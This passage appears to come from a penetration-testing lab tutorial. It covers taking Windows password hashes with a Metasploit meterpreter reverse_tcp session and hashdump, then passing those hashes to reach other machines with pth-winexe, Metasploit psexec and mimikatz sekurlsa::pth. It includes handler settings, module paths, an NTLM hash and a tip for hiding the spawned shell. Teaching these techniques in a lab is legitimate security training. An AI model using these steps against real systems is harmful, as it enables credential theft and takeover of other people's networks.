To extract the hash passwords from a victim, some hackers will use Metasploit. By using Metasploit a hacker can create a reverse_tcp payload and use it to establish a meterpreter session on the victim's device. Once a meterpreter session is created, the hacker can dump the contents of the SAM by typing the command hashdump. Before hashdump can be successfully executed, the attacker must type getsystem and getprivs to escalate their level of access on the victim's device. The following lab will demonstrate how this is done. Screenshots are provided to help you follow along.
Step one involves creating a payload to send to the victim. For this lab, we will use msfvenom to create a meterpreter reverse_tcp payload:
The preceding screenshot displays the successful creation of a reverse_tcp payload.
After we have created the payload the second step is to set up the multi-handler. We will need to set the payload, LHOST, and LPORT for the multi-handler. Once the options are set we type exploit and start the handler. Once the victim activates the payload, a meterpreter session will be established. The following screenshot demonstrates what an established session looks like:
The third step is to escalate system privileges on the victim machine. We need to type two commands. The first command is getsystem and the second one is getprivs. By escalating our system privileges, we can now execute the command hashdump. The following screenshot shows the successful escalation of system privileges on the victim machine:
The fourth and final step is to now type the command run hashdump. By using this command, we can get the hashed passwords of the user and administrator. A hacker would use these hashes to gain access to other devices on the domain. Normally you would see hundreds or even thousands of usernames and password hashes on a large enterprise business network. The following screenshot displays what the hashed passwords look like:
Now that we have successfully captured the password hashes, we can move on to the next lab. In this second lab, we will demonstrate how to pass the hash, allowing access to another device. Kali Linux comes with a Pass the Hash toolkit. This toolkit is excellent at executing pass the hash attacks. Other great tools that can be used are mimikatz and PsExec.
The next lab will demonstrate how to use several different tools to pass the hash. The first tool is the Pass the Hash toolkit. We will type -pth-winexe -U followed by the harvested credentials. The following screenshot shows the command:
Another way to pass the hash is to use a tool called PsExec. This tool can be found within Metasploit. The setup for PsExec is same as the multi-handler setup:
- We start by typing msfconsole.
- We then type use exploit/windows/smb/psexec. The next screen will ask us to set the options for the listener.
- First we set the payload by typing set payload windows/meterpreter/reverse_tcp.
- Now we set the LHOST 192.168.57.130, LPORT 443, and the RHOST 192.168.57.131. The RHOST IP is the victim device.
- The final option to set is the smb password.
- Type set SMBPass and enter the hash of the device you wish to gain access to.
- Type exploit and you will see a meterpreter session established to the victim's device.
Hackers will often establish multiple sessions to maintain access to a device. If a session dies they can use two or three other backup sessions to continue with the attack.
The following screenshot shows a successful meterpreter session being established on a second device by passing the hash:
The third pass the hash tool we will demonstrate is called mimikatz. This is a great tool to use for passing the hash. mimikatz is classified as a post-exploitation tool. It was created by Benjamin Delpy. mimikatz has many features besides passing the hash. For example, if you want to obtain the hashes through mimikatz, use the command mimikatz_command -f hashdump::hashes. The following screenshot demonstrates what this command looks like:
For this example, we will be using a module found within mimikatz called sekurlsa. First type mimikatz, and then type sekurlsa::pth /user:Administrator /domain:ethicalhaks.local /ntlm:cc36cf7a8514893efccd332446158b1a /run:cmd. The cmd argument at the end of the command will open a shell on the victim machine. You can also type -w hidden after cmd to hide the shell being opened on the victim's device. One interesting characteristic of mimikatz is since the creator is from France; many of the module description pages are in French instead of English. The following screenshot shows what one of the module pages looks like:
The following screenshot shows a meterpreter session established on a second device by mimikatz. Once we have a second meterpreter session opened we can now dump the hashes of the domain the second device is connected to. This is an excellent technique to quickly compromise multiple domains:
